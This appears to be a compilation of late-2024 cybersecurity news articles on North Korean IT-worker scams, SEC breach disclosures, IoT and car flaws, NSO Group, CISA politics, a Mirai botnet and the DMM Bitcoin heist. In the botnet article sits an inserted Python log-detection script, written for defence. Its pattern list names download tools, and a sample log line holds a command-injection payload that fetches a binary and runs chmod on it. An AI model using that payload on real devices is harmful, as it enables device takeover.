South Korea sanctions 15 North Koreans for IT worker scams, financial hacking schemes


The South Korean government has sanctioned more than a dozen individuals and one organization for a wide-ranging global scheme to fund North Korea’s nuclear and missile programs through impersonating IT workers abroad, stealing cryptocurrency and facilitating cyberattacks.

South Korean officials on Thursday identified 15 North Korean nationals and the Chosun Geumjeong Economic Information Technology Exchange Corporation for economic sanctions. The individuals are allegedly working for North Korea’s 313th General Bureau, part of the DPRK’s Ministry of Munitions Industry, which oversees Pyongyang’s weapons production, research and development and ballistic missile programs.

The individuals and others “are known to be dispatched to China, Russia, Southeast Asia, Africa, and other countries as employees of regime-affiliated organizations such as the Ministry of Defense, disguising their identities and receiving work from IT companies around the world, while some are also known to be involved in information theft and cyberattacks,” according to a machine-translated press release from South Korea’s Peninsula Policy Bureau.

The Chosun Geumjeong Economic Information Technology Exchange Corporation is described as a company that “dispatches many North Korean IT personnel overseas and pays a large amount of military funds to the North Korean regime,” according to the release.

The practice of North Koreans posing as IT workers to gain employment at Western firms — bypassing work restrictions and earning revenue for their home government — has become a frequent occurrence in recent years. The growing trend has increasingly alarmed U.S. and Western national security officials, as well as company executives who have publicly come forward with their experiences after being duped.

Beyond just earning a paycheck, placing North Korean operatives in technical roles at Western firms can also make it easier to carry out hacking operations and cryptocurrency theft. In some cases, these workers have installed malicious software on company devices, stolen hundreds of thousands of dollars from companies and attempted to gain access to sensitive software building environments. Some executives suggest the issue is likely worse than the public understands, as the stigma of hiring a fraudulent employee still pushes companies to keep quiet.

South Korea also accused its northern neighbor of playing an outsized role in global cryptocurrency theft. A 2024 report by a United Nations panel stated that it is investigating at least 58 cyberattacks by DPRK operatives against cryptocurrency companies between 2017 and 2023, with the incidents yielding an estimated $3 billion in stolen gains. The panel also investigated “reports of numerous Democratic People’s Republic of Korea nationals working overseas earning income in violation of sanctions, including in the information technology, restaurant and construction sectors.”

In addition to threatening the overall cyber ecosystem, South Korea said the actions pose “a serious threat to international peace and security in that it is being used to fund North Korea’s nuclear and missile development.”


Written by Derek B. Johnson

Derek B. Johnson is a reporter at CyberScoop, where his beat includes cybersecurity, elections and the federal government. Prior to that, he has provided award-winning coverage of cybersecurity news across the public and private sectors for various publications since 2017. Derek has a bachelor’s degree in print journalism from Hofstra University in New York and a master’s degree in public policy from George Mason University in Virginia.




SEC Disclosures Up, But Not Enough Details Provided


The new cybersecurity disclosure rules introduced by the US Securities and Exchange Commission (SEC) last year have resulted in a significant increase in incident reports from public companies, but most of the reports do not describe the material impact of those incidents, according to a law firm specializing in finance and M&A activity.

Analysis by Paul Hastings LLP found cybersecurity incident reports have increased by 60% since the disclosure rule went into effect in 2023. The SEC regulation requires public companies to disclose material cybersecurity incidents within four business days of determining materiality. Material, in this instance, means that the incident can impact someone’s decision on whether to invest in the company. Determining materiality involves considering the immediate fallout and any longer-term effects on a company’s operations, customer relationships, financial impact, reputational or brand perception, and the potential for litigation or regulatory action.

As the chart above shows, the impact of the regulation spans numerous industries. While the financial services sector accounted for the largest number of disclosure reports, industrials and healthcare were also heavily impacted. Automotive retail and retail entities were also hit by cyberattacks and had to report those incidents.

Fewer than 10% of the disclosures detailed the material impacts of the incidents, suggesting that companies are having difficulty balancing detailed reporting with protecting the details of internal operations. The report included examples of what was considered material, such as Bassett Furniture Industries noting that business operations are materially impacted until recovery efforts are completed, or First American Financial disclosing adjusted earnings per share for the fourth-quarter financial results and quantifying the losses in the company’s SEC filings.

Some companies (13%) opted to provide a press release or a reference to a blog post to provide more details about the incident.

Third-Party Breach Impact

One in four incidents in the report were third-party breaches. Companies are struggling to figure out whether to disclose third-party breaches, especially if other victims have disclosed the incidents. The automotive retail sector was affected primarily by the ransomware attack on automotive software provider CDK Global in June. The company paid a $25 million ransom. CDK’s parent company, Brookfield Business Partners, said in its July disclosure that the company did not “expect this incident to have a material impact.” Many of the smaller automotive companies claimed material impact as a result of CDK’s incident.

The SEC recently announced enforcement settlements with four SolarWinds customers for allegedly making misleading disclosures related to how they were impacted by the cyberattack. Two of the four publicly disclosed the incidents but did not disclose all material facts known at the time, such as the name of the threat actor, nature of information stolen, and number of accounts accessed. The other two did not disclose the incidents, and the SEC said they should have disclosed the impact.

Speed or More Details?

More than three-quarters (78%) of disclosures were made within eight days of discovery of the incident. The SEC specified that the four-business-day clock starts not when the incident is discovered but when materiality has been determined, yet most companies opted to act quickly. A third (32%) filed within four days of discovery. This suggests that companies are reporting quickly to avoid being fined by the SEC for delayed disclosure, but perhaps too quickly, since they have not yet determined the full implications of the incident. This may be why 42% of the companies wound up filing multiple reports for the same incident, each time providing more details, such as quantifiable loss, impact to customer personal data, and notification to individuals and regulators.

“Companies should continue to evaluate disclosure controls and engage in tabletop exercises to practice the decision-making required to make such materiality decisions in the event of a cyber incident,” the report’s authors said.




Windows 11 installation media bug causes security update failures



Microsoft is warning of an issue when using installation media to install Windows 11, version 24H2, that causes the operating system to stop accepting further security updates.

The problem occurs when installing Windows 11 24H2 from CD or USB flash drive media that has the security updates released between October 8 and November 12 integrated into it.

“When using media to install Windows 11, version 24H2, the device might remain in a state where it cannot accept further Windows security updates,” Microsoft is warning.

“This occurs only when the media is created to include the October 2024, or November 2024, security updates as part of the installation,” the company explains.

The bug does not impact security updates applied via Windows Update or the Microsoft Update Catalog website and does not occur when the latest December 2024 security update is used.

Microsoft is currently working on a permanent fix and recommends that media-based Windows 11 24H2 installations use the December 2024 security update, released on December 10, to avoid encountering subsequent updating problems.

Windows 11 24H2 issues

The installation media issue is added to a long string of problems that impact 24H2, the latest major feature update for Microsoft’s operating system, which was released earlier this year to offer enhanced security, usability, and performance.

Previously, Windows 11 24H2 users were impacted by audio problems on Dirac devices or USB DAC sound systems, Outlook launch issues when using outdated Google Workspace Sync, Auto HDR causing game freezes and incorrect colors, and functional problems with USB scanners supporting the eSCL protocol.

Notably, the major Windows update caused performance problems, crashes, freezes, and audio glitches on a number of Ubisoft games, including popular titles like Assassin’s Creed, Star Wars Outlaws, and Avatar: Frontiers of Pandora.

The Windows 11 24H2 update was even temporarily blocked on specific ASUS hardware and various other software/hardware configurations that caused problems.




Ruijie Networks’ Cloud Platform Flaws Could Expose 50,000 Devices to Remote Attacks


Dec 25, 2024 | Ravie Lakshmanan | Cloud Security / Vulnerability

Cybersecurity researchers have discovered several security flaws in the cloud management platform developed by Ruijie Networks that could permit an attacker to take control of the network appliances.

“These vulnerabilities affect both the Reyee platform, as well as Reyee OS network devices,” Claroty researchers Noam Moshe and Tomer Goldschmidt said in a recent analysis. “The vulnerabilities, if exploited, could allow a malicious attacker to execute code on any cloud-enabled device, giving them the ability to control tens of thousands of devices.”

The operational technology (OT) security company, which carried out in-depth research of the Internet of Things (IoT) vendor, said it not only identified 10 flaws but also devised an attack called “Open Sesame” in which an attacker in close physical proximity to an access point can compromise it over the cloud and gain unauthorized access to its network.


Of the 10 vulnerabilities, three are rated Critical in severity:

  • CVE-2024-47547 (CVSS score: 9.4) – Use of a weak password recovery mechanism that leaves the authentication mechanism vulnerable to brute-force attacks
  • CVE-2024-48874 (CVSS score: 9.8) – A server-side request forgery (SSRF) vulnerability that could be exploited to access internal services used by Ruijie and its internal cloud infrastructure via AWS cloud metadata services
  • CVE-2024-52324 (CVSS score: 9.8) – Use of an inherently dangerous function that could allow an attacker to send a malicious MQTT message, resulting in devices executing arbitrary operating system commands

Claroty’s research also found that it’s easy to break MQTT authentication by simply knowing the device’s serial number (CVE-2024-45722, CVSS score: 7.5), subsequently exploiting the access to Ruijie’s MQTT broker in order to receive a full list of all cloud-connected devices’ serial numbers.

“Using the leaked serial numbers, we could generate valid authentication credentials for all cloud-connected devices,” the researchers said. “This meant that we could perform a wide range of denial-of-service attacks, including disconnecting devices by authenticating on their behalf, and even sending fabricated messages and events to the cloud; sending false data to users of these devices.”

Knowledge of the device serial number could further be weaponized to access all MQTT message queues and issue malicious commands that would then be executed on all cloud-connected devices (CVE-2024-52324).

That’s not all. An attacker who is physically adjacent to a Wi-Fi network that uses Ruijie access points could also extract the device’s serial number by intercepting the raw Wi-Fi beacons, and then leverage the other vulnerabilities in MQTT communication to achieve remote code execution. The Open Sesame attack has been assigned the CVE identifier CVE-2024-47146 (CVSS score: 7.5).

Following responsible disclosure, all the identified shortcomings have been fixed by the Chinese company on the cloud side, and no user action is required. About 50,000 cloud-connected devices are estimated to have been potentially impacted by these bugs.

“This is another example of weaknesses in so-called internet-of-things devices such as wireless access points, routers, and other connected things that have a fairly low barrier to entry on to the device, yet enable much deeper network attacks,” the researchers said.


The disclosure comes as security firm PCAutomotive flagged 12 vulnerabilities in the MIB3 infotainment unit used in certain Skoda cars that malicious actors could chain together to achieve code execution, track the cars’ location in real time, record conversations via the in-car microphone, take screenshots of the infotainment display, and even exfiltrate contact information.

The flaws (from CVE-2023-28902 through CVE-2023-29113) permit attackers to “gain code execution on the MIB3 infotainment unit over Bluetooth, elevate privileges to root, bypass secure boot to gain persistent code execution, and control infotainment unit via DNS channel every time the car starts,” PCAutomotive researchers said.

The discovery adds to nine other flaws (from CVE-2023-28895 through CVE-2023-28901) identified in the MIB3 infotainment unit in late 2022 that could allow attackers to trigger a denial-of-service, bypass UDS authentication, and obtain vehicle data — namely, mileage, recent trip duration, and average and maximum speed of the trip — by knowing only the VIN of a vehicle.





Former NSA cyberspy’s not-so-secret hobby – Xmas light hacks • The Register


In 2018, Rob Joyce, then Donald Trump’s White House Cybersecurity Coordinator, gave a surprise talk at the legendary hacking conference Shmoocon about his hobby.

As the former head of the NSA’s Tailored Access Operations squad – the people who crack systems and gather intelligence for the US government – Joyce was also the friendly public face of the agency. The agency didn’t come out of the Edward Snowden affair with a great reputation when the ex-NSA contractor-turned-whistleblower made public the existence of the NSA data collection programs back in June 2013. Many in the security industry were peeved at the agency’s disregard for privacy and the accepted norms under which people assumed it operated.

Joyce was part of a campaign to make the NSA acceptable again, and he was doing a good job. We covered his talk at the first Enigma security conference, and it was unusually frank – most talks by agency personnel are about as exciting as watching paint dry.

But the Shmoocon talk (see below) was a personal matter. It turns out Joyce is a big fan of Christmas, and of hacking the seasonal strings of lights that hang off so many American houses during the holiday season. As you can see from the video below, he’s serious about it and applies all the rigor normally used to break into adversaries’ networks to put on a show.

Youtube Video

Next year, at the last Shmoocon, Joyce will reprise his talk and offer updates on how to turn your house into a light show that will either delight, or irritate, the neighbors. He spoke to The Register ahead of time to explain the hobby.

The Register: The first and most obvious question: why? What got you into this?

Joyce: We had a family tradition where we drove around looking at Christmas lights on Christmas Eve with the kids. And we passed a house only a few miles from us that had computer-controlled LEDs synchronized to music and a little radio station you tuned to. And it just captivated me.

It was not elegant, right? It was over the top and gaudy, and just really made me happy. I said “I think I could do that,” meaning I have the technical chops to achieve it. And [Joyce’s wife] said, “yes you can,” and I took that as license to mean, “yes, you can do it.” And so when boxes started arriving in the mail in February and March, she’s like, “what the hell is this?”

The Register: In terms of work time, how long does a setup like this take?

Joyce: The startup was enormous if you’ve seen the images. I could cover the house and put things in the yard, and there are a bunch of different props that are created. If I knew how much work it was I would not have started.

But now the incremental work is not so bad. It takes me about three and a half days to get things set up. I hope for a weather window, and the first day I start is somewhere right before Thanksgiving because the first thing I do is the very top of the roof, up on the outside of the house. The second day is the next layer of things on the house, and then after that, if we have bad weather, I can do things on the ground and around the yard without much concern – but I don’t want to be on the roof in bad weather and wind.

Youtube Video

The Register: A senior person in the NSA ordering huge amounts of electronic equipment from China didn’t set off any red flags?

Joyce: None of the compute comes from China, just the LED strings themselves. I would applaud somebody if they could supply chain that.

I do take a little more care in the control system itself. It’s not connected to the internet and is a standalone network – because I do have friends who have interesting hobbies and would love to change my display and make it say some interesting things.

The Register: You’ve said that the things that impress many people aren’t the lights themselves but the radio station that synchronizes with them. How’s that set up?

Joyce: It’s probably on the hairy edge of what the FCC would approve, but I make sure it’s not interfering with anything in the neighborhood. It’s probably the least technical part of the whole creation. You plug an audio signal in and it just spits it out as a radio channel. I did custom make the antenna to make sure that there’s good reception.

The Register: What about the software, do you code it yourself?

Joyce: I don’t write the software. I use an open source product called xLights that will let you map the songs to your display. And there’s a group of people out there who write that software and improve it constantly. I’m very grateful to them and donate to their project every year to help keep them going. But much like me, they do it as a labor of love.

Then there’s some software that runs on Raspberry Pis that controls the flat panel displays that are hung on the outside of the house, and also pipes all the pixel commands in real time out to all the lights across the whole show. That also is open source and part of this hobbyist community.

The Register: Is the Christmas lights hobbyist community that large?

Joyce: Well, every year xLights puts out a song and they put out the light sequence to it, and then all these people map them to their display and record their house. Then they cut together a video of all of these different houses doing the same song. And there’s thousands of people that do that. It got so big. I did it for a couple of years, but I stopped doing it just because it’s so big.

The Register: Are you still using the same controller board?

Joyce: No, they’re out in the cold, and they get a lot of thermal cycling. That makes them a little flaky. The technology has advanced now. Now it’s all surface mount technology, and they include better debugging to help you figure out where your issues are. And there’s a Raspberry Pi as the main controller.

The Register: And for connections – wired or wireless?

Joyce: I still do Ethernet. You know, wireless introduces delays and I worry about interference and the signal. Also I still don’t want the mischievous friends coming over and messing with my wireless. They can roll up with a cable of Ethernet and jack into the local network there, but the security cameras outside would spot them.

Youtube Video

The Register: What do the neighbors think of all this?

Joyce: I’m trying to keep my neighbors reasonably happy. They all enjoy the light show to an extent, but these days they can’t get in their driveway because the traffic is backed up. You know, that makes for unhappy neighbors. I had one family and was getting the vibes that they weren’t that crazy about it, but they’ve had children and the grandchildren love it, and I think it reminded them of the joy it brings to other visitors.

When there are low lying clouds, you can be a mile away from the house and you’ll see the clouds change color, so it’s always going to be nice thinking, “Yeah, I did that.”

The Register: What advice would you give to people that want to get into this?

Joyce: Have an understanding partner.

Seriously, go to the xLights website. There’s a forum there that will link you to the YouTube community. There are great tutorials on YouTube, and there’s a bunch of very active Facebook groups, and on the xLights site you’ll find something people refer to as the xLights Zoom Room. It’s a group of people who volunteer their time and they sit on Zoom calls and help people work through the technical issues they have.

The Register: Can you give us a rough idea of what the setup on something like this would cost?

Joyce: Oh no, I’m from NSA. I know how to keep a secret.

Joyce also has a Twitter account devoted to his hobby. For security (and traffic) reasons, we won’t be publishing his physical address. ®

It’s spreading to Europe …

American-style Christmas lights aren’t as popular in Europe, but they’re catching on, especially as hackers get in on the game. 

The Register spoke to a British security operations center manager and volunteer admin for xLights, who developed a passion for fiddling with lighting after seeing the 2018 talk, and there are about 1,300 enthusiasts in the scene in Europe. This year’s spectacle looks superb, but there are issues that Joyce doesn’t have to deal with.

Regulation is a problem, Paul Glavin explained. As of next year, US manufacturers might not be able to sell the control systems for such lighting displays in the UK. So a grassroots startup Buildalightshow is building its own control boards to brighten up the Solstice night.

“We now have a UK-based board – it’s called a Baldrik board. The network that they operate on is called the turnip network. It’s just that kind of humor behind it [Ed: This is a Blackadder reference, as they have a cunning plan]. So it just gives you a bit of a giggle.”

And while Joyce can broadcast Christmas carols via radio, that’s not really allowed in the UK, so Glavin has speakers on the lawn instead. As a result, he only runs the lights for an hour each day to avoid being impolite to the neighbors and to cut down on traffic, but the project raises money for local school meals.

“The main reason I do it is the love others have for it. I’ve just come in from the 17:30 showing, which had kids dancing and singing along to the songs,” he said on Monday. Given last year’s soundtrack, that’s understandable.

“I had parents telling me this is their x year seeing the lights and this was the only thing their daughter wanted to see this Christmas, other families have mentioned this year that it’s their family tradition; so no matter how hard it gets to put the show on, how much I hate being up a ladder, how much I curse whichever storm has ripped through the garden and damaged yet more props, or more LEDs have failed, I have to keep it going for the local community.”




Judge grants ruling in favor of WhatsApp against spyware firm NSO Group


A federal judge has dealt the first major legal blow against spyware maker NSO Group, ruling in favor of WhatsApp in a five-year-old lawsuit against the Israeli firm over allegations that it hacked the chat service.

Northern California District Court Judge Phyllis Hamilton made her ruling on Friday as a summary judgment, thus not requiring a full trial. She determined that NSO Group violated U.S. and California anti-hacking laws and had failed to obey court orders to produce evidence, especially the Pegasus spyware source code.

It’s the biggest turn in a case that at one point compelled the Supreme Court to weigh in and that has produced a bevy of revelations, and is perhaps the biggest ruling to date against a spyware maker in what is a difficult forum for victims.

“This is a historic judgment and a first major court victory against NSO Group in the world, finding them liable for compromising the digital security infrastructure that millions of people rely on,” said Natalia Krapiva, senior tech-legal counsel at the Access Now digital rights group. “While the trial will continue on how much damages NSO should pay, the partial summary judgment is a major win for WhatsApp, civil society, and Pegasus victims around the world.”

Officials at Meta, the parent company of WhatsApp, also celebrated the ruling.

“This ruling is a huge win for privacy,” Will Cathcart, head of WhatsApp, said on Threads. “We spent five years presenting our case because we firmly believe that spyware companies could not hide behind immunity or avoid accountability for their unlawful actions. Surveillance companies should be on notice that illegal spying will not be tolerated.”

Added Meta CEO Mark Zuckerberg: “Proud that we fought for this and that WhatsApp continues to lead on privacy and encryption 💪”

A spokesperson for NSO Group said the company had no comment at this time.

WhatsApp accused NSO Group of sending malware to infect around 1,400 mobile phones and devices. NSO Group contended, in part, that the plaintiffs lacked personal jurisdiction to bring the suit, citing other cases that had been dismissed.

“The key distinction in all of those cases appears to be the citizenship/residency of the plaintiffs,” Hamilton wrote. “In this case, defendants do not dispute that plaintiffs are citizens of the United States and residents of this district, making the cited cases inapposite.”

Krapiva said the ruling should force other spyware companies to “take notice. The wheels of justice are slow, but the period of impunity for spyware purveyors and abusers is winding down.”


Written by Tim Starks

Tim Starks is senior reporter at CyberScoop. His previous stops include working at The Washington Post, POLITICO and Congressional Quarterly. An Evansville, Ind. native, he’s covered cybersecurity since 2003. Email Tim here: tim.starks@cyberscoop.com.



Trump 2.0 Portends Big Shift in Cybersecurity Policies


Before it was subsumed by political commentary, the Cybersecurity and Infrastructure Security Agency (CISA) was a Trump accomplishment — signed into existence in 2018 during his first administration. But that was before accusations of dirty politics and free speech shenanigans turned CISA into a conservative pariah.

Now, CISA is facing an existential political clash with the incoming Trump administration, threatening to take much of the US federal government’s involvement in cybersecurity along with it. The result could potentially increase cyber-risk, but also open up business, investment, and innovation opportunities. A lot of things can be true at once.

CISA’s original mandate couldn’t have seemed more apolitical: coordinate defending US infrastructure against cyberattacks, and then help share critical information among US enterprises to increase the nation’s overall posture in the bargain. But then came the 2020 election, CISA’s efforts to combat what the agency deemed “misinformation,” and the subsequent conservative backlash.

Trump and the Politics of CISA

Chris Krebs, then the agency’s director, was very publicly fired just weeks after the 2020 election for rejecting claims of fraud from the Trump administration, and has remained a high-profile political player ever since. Krebs is a regular on the cable news circuit, and in July 2023, he confirmed to CNN that he was interviewed by special counsel Jack Smith in the investigation into Trump and the 2020 election. In the runup to the 2024 election, Krebs appeared on outlets including Face the Nation to once again push back on Trump campaign claims of election fraud.

His replacement, Jen Easterly, took a more low-key approach. Her accessibility, deep military ties, and cybersecurity expertise — sprinkled with a dash of aspirational cool-girl charm — made her a hit among the cyber rank-and-file. She also mostly stayed away from politics, leading the fledgling agency through a crucial four years. But that effort, however disciplined and well intentioned, hardly spared Easterly or CISA from widespread conservative ire. In January 2024, Easterly was even targeted at home in a swatting incident.

“I think Jen Easterly had a tremendous challenge solidifying the role of a very young agency, and one mired in allegations from Republican politicians,” cybersecurity expert Jake Williams tells Dark Reading. “Given those very real challenges, she did an outstanding job. I can only imagine what could have been with bipartisan support for CISA’s many missions.”

Following the 2024 election, Easterly said she will resign on Inauguration Day. But the agency is still at work, publishing a draft of an updated National Cyber Incident Response Plan for federal agencies and industry to work together during major cyber events, which is open for comments until January 2025.

That kind of coordination between CISA and the private sector was exactly what the agency was built to become under the Biden administration. It took a proactive role in developing cybersecurity standards, and offering cybersecurity grants to states to invest in their own cyber operations, led largely by the efforts of Easterly. During his administration, President Biden allocated billions to strengthen the US cybersecurity infrastructure, and signed a flurry of executive orders on everything from AI to zero trust in an effort to raise the country’s level of cyber preparedness.

Some of the agency’s notable accomplishments during the past four years included establishment of the Joint Cyber Defense Collaborative (JCDC) and the Known Exploited Vulnerabilities (KEV) program, according to Casey Ellis, Bugcrowd founder. Ellis also worked with CISA on the federal CEB vulnerability disclosure program, where CISA serves as a repository for researchers who discover flaws in government systems so they can be reported and mitigated more quickly.

There have been setbacks as well. While the KEV list has been credited with speeding up remediation, it can take months to make the list. Much of that new cyber infrastructure and rulemaking also came with regulation and compliance headaches that some criticized as a barrier to innovation, particularly by Congress. Others defended the agency’s moves as necessary to drive security investment.

“Under Jen Easterly, CISA’s proactive initiatives such as Secure by Design and faster reporting of attacks by companies were positive for both the sell and buy side of the cybersecurity industry,” says Jason Soroko, senior fellow at Sectigo. “What could be seen as regulatory burden was actually a positive call to arms to do the right thing.”

Accomplishments and accolades aside, Easterly and CISA haven’t been able to convince key conservatives like Sen. Rand Paul, who is about to chair the Senate Homeland Security and Governmental Affairs Committee, which oversees CISA, that the agency is doing any good. After acknowledging he probably won’t be able to eliminate CISA altogether, last month Paul vowed to impose strict limits in response to actions he said the agency took to target conservative voices as part of its work in combating foreign influence operations. At a minimum, CISA will likely be stripped of its mandate to investigate misinformation.

Williams also expects the agency will have a diminished role in overseeing election security, the very issue that catapulted the cyber agency into the national headlines in 2020.

Cybersecurity Opportunities Under Trump 2.0

A shrinking CISA footprint and the Trump administration’s expressed distaste for regulation and interest in opening government operations to more public-private partnerships mean there are going to be potential opportunities in the next few months for the private sector that hadn’t existed before.

“I expect we’ll see a more direct set of conversations around cyber offense and deterrence, especially as it relates to countering Russia, Iran, and in particular, China,” Ellis predicts. “This could include changes to the structure of [the National Security Agency] and Cyber Command, and the inclusion of the private sector in defend-forward and disruption operations.”

Beyond new opportunities to work with government, Ellis adds cybersecurity deregulation is on the way.

“In general, I think we can expect a more overt and domestically deregulated approach to cyberspace, reflecting the general policy approach of the Trump administration and a more open acknowledgement that Cold War 2 is already underway.”

The new administration also likely signals a change in federal enforcement of Securities and Exchange Commission (SEC) regulations against chief information security officers (CISOs), like what security executives from SolarWinds and Uber experienced, according to expert John Bambenek.

“Regulatory enforcement on companies will lessen, for instance, [and] it is doubtful CISOs will see any government attempts to make them liable for breaches,” Bambenek says. “I’m not sure any more antitrust action will commence against large tech companies either, which will fuel further consolidation of technology and security companies.”

There is cautious optimism that this more hands-off approach from the Trump administration will still preserve a basic role for the federal government in cybersecurity. That role is particularly necessary in terms of resources, according to Roselle Safran, the former director of the Executive Office of the President security operations center under Barack Obama, and currently president of cybersecurity company KeyCaliber.

“While there are certainly plenty of other issues that appear to be top priorities for the next administration, it is my hope that cybersecurity will not be relegated to the back burner,” Safran says. “It’s important that there is recognition that cybersecurity needs significant and sustained resources.”

Trump takes office against the backdrop of unprecedented numbers of cyberattacks, the rise of artificial intelligence, and cyber-military conflicts across the globe. Keeping politics out of the conversation is the best way for CISA to continue its work beyond the next election, experts advise. However, that might be an impossible challenge.

“I’m concerned about some of the negative sentiment around CISA impacting progress that has been made since 2018,” Ellis adds. “However, I am cautiously optimistic that the priorities Trump had in mind when he formed the agency will see its overall defensive mission carry forward.”


New botnet exploits vulnerabilities in NVRs, TP-Link routers


A new Mirai-based botnet is actively exploiting a remote code execution vulnerability in DigiEver DS-2105 Pro NVRs that has not been assigned a tracking identifier and appears to be unpatched.

The campaign started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.

One of the vulnerabilities used in the campaign was documented by TXOne researcher Ta-Lun Yen and presented last year at the DefCamp security conference in Bucharest, Romania. The researcher said at the time that the issue affects multiple DVR devices.

Akamai researchers observed that the botnet started to exploit the flaw in mid-November, but found evidence that the campaign has been active since at least September.

Apart from the DigiEver flaw, the new Mirai malware variant also targets CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers.

Attacks on DigiEver NVRs

The vulnerability exploited to compromise DigiEver NVRs is a remote code execution (RCE) flaw, and the hackers are targeting the ‘/cgi-bin/cgi_main.cgi’ URI, which improperly validates user inputs.

This allows remote unauthenticated attackers to inject commands like ‘curl’ and ‘chmod’ via certain parameters, such as the ntp field in HTTP POST requests.

Akamai says that the attacks it has seen by this Mirai-based botnet appear similar to what is described in Ta-Lun Yen’s presentation.

Through command injection, the attackers fetch the malware binary from an external server and enlist the device into the botnet. Persistence is achieved by adding cron jobs.
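One way to spot this injection pattern in an NVR’s web-server logs, as an added example that is not part of Akamai’s report or of the original article: the log-line format, the client addresses and the request bodies below are all constructed, while the URI and the ntp parameter name come from the text above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log format (constructed for this example, not a real NVR log):
#   "<client-ip> <METHOD> <path> <status> body=<url-encoded POST body>"
LINE_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})"
    r"(?: body=(?P<body>.*))?$"
)

# URI and parameter named in the article; extend SUSPECT_PARAMS as needed.
TARGET_PATH = "/cgi-bin/cgi_main.cgi"
SUSPECT_PARAMS = ("ntp",)
# Shell metacharacters that have no business in an NTP server name, plus the
# download/permission commands the article says are being injected.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")
INJECTED_CMDS = re.compile(r"\b(curl|wget|chmod|tftp|busybox)\b", re.IGNORECASE)

def classify_request(line):
    """Return (client, param, decoded_value) for a suspicious POST, else None."""
    m = LINE_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    if urlsplit(m.group("path")).path != TARGET_PATH:
        return None
    # parse_qs percent-decodes values and turns '+' into spaces for us.
    params = parse_qs(m.group("body") or "", keep_blank_values=True)
    for name in SUSPECT_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value) or INJECTED_CMDS.search(value):
                return (m.group("client"), name, value)
    return None

def scan(lines):
    """Run classify_request over every line and collect the hits."""
    return [hit for hit in map(classify_request, lines) if hit is not None]

# Constructed sample traffic: one legitimate NTP change and one injection attempt.
SAMPLE_LOG = [
    "10.0.0.12 GET /cgi-bin/cgi_main.cgi?cgiName=time 200",
    "10.0.0.12 POST /cgi-bin/cgi_main.cgi 200 body=ntp=pool.ntp.org&tz=UTC",
    "203.0.113.77 POST /cgi-bin/cgi_main.cgi 200 body=ntp=pool.ntp.org"
    "%3Bcurl+http%3A%2F%2F203.0.113.5%2Fm+-o+%2Ftmp%2Fm%3Bchmod+777+%2Ftmp%2Fm",
    "203.0.113.78 POST /login.cgi 401 body=user=admin",
]

if __name__ == "__main__":
    for client, param, value in scan(SAMPLE_LOG):
        print(f"ALERT {client}: {param}={value!r}")
```

The same check belongs on the egress side as well: an NVR that suddenly fetches a binary over HTTP and writes a new cron entry is the post-exploitation half of the chain the article describes.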

Once the device is compromised, it is then used to conduct distributed denial of service (DDoS) attacks or to spread to other devices by leveraging exploit sets and credential lists.

Akamai says the new Mirai variant is notable for its use of XOR and ChaCha20 encryption and its targeting of a broad range of system architectures, including x86, ARM, and MIPS.

“Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” comments Akamai.

“This is mostly notable because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original Mirai malware source code release,” the researchers say.

The researchers note that the botnet also exploits CVE-2018-17532, a vulnerability in Teltonika RUT9XX routers as well as CVE-2023-1389, which impacts TP-Link devices.

Indicators of compromise (IoCs) associated with the campaign are available at the end of Akamai’s report, along with YARA rules for detecting and blocking the threat.


North Korean Hackers Pull Off $308M Bitcoin Heist from Crypto Firm DMM Bitcoin


Dec 24, 2024 | Ravie Lakshmanan | Cybercrime / Malware

Japanese and U.S. authorities have formally attributed the theft of cryptocurrency worth $308 million from cryptocurrency company DMM Bitcoin in May 2024 to North Korean cyber actors.

“The theft is affiliated with TraderTraitor threat activity, which is also tracked as Jade Sleet, UNC4899, and Slow Pisces,” the agencies said. “TraderTraitor activity is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously.”

The alert comes courtesy of the U.S. Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center, and the National Police Agency of Japan. It’s worth noting that DMM Bitcoin shut down its operations earlier this month in the aftermath of the hack.

TraderTraitor refers to a North Korea-linked persistent threat activity cluster that has a history of targeting companies in the Web3 sector, luring victims into downloading malware-laced cryptocurrency apps and ultimately facilitating theft. It’s known to be active since at least 2020.

In recent years, the hacking crew has orchestrated a series of attacks that leverage job-themed social engineering campaigns or reach out to prospective targets under the pretext of collaborating on a GitHub project, which then leads to the deployment of malicious npm packages.

The group, however, is perhaps best known for infiltrating and gaining unauthorized access to JumpCloud’s systems to target a small set of downstream customers last year.

The attack chain documented by the FBI is no different in that the threat actors contacted an employee at a Japan-based cryptocurrency wallet software company named Ginco in March 2024, posing as a recruiter and sending them a URL to a malicious Python script hosted on GitHub as part of a supposed pre-employment test.

The victim, who had access to Ginco’s wallet management system, was subsequently compromised after they copied the Python code to their personal GitHub page.

The adversary moved to the next phase of the attack in mid-May 2024, when it exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system.

“In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agencies said. “The stolen funds ultimately moved to TraderTraitor-controlled wallets.”

The disclosure comes shortly after Chainalysis attributed the hack of DMM Bitcoin to North Korean threat actors, stating the attackers targeted vulnerabilities in infrastructure to make unauthorized withdrawals.

“The attacker moved millions of dollars’ worth of crypto from DMM Bitcoin to several intermediary addresses before eventually reaching a Bitcoin CoinJoin Mixing Service,” the blockchain intelligence firm said.

“After successfully mixing the stolen funds using the Bitcoin CoinJoin Mixing Service, the attackers moved a portion of the funds through a number of bridging services, and finally to HuiOne Guarantee, an online marketplace tied to the Cambodian conglomerate, HuiOne Group, which was previously exposed as a significant player in facilitating cybercrimes.”

The development also comes as the AhnLab Security Intelligence Center (ASEC) revealed that the North Korean threat actor codenamed Andariel, a sub-cluster within the Lazarus Group, is deploying the SmallTiger backdoor as part of attacks targeting South Korean asset management and document centralization solutions.


Tech glitch briefly grounds US American Airlines flights • The Register


A technical snafu briefly grounded American Airlines flights across the US on Christmas Eve.

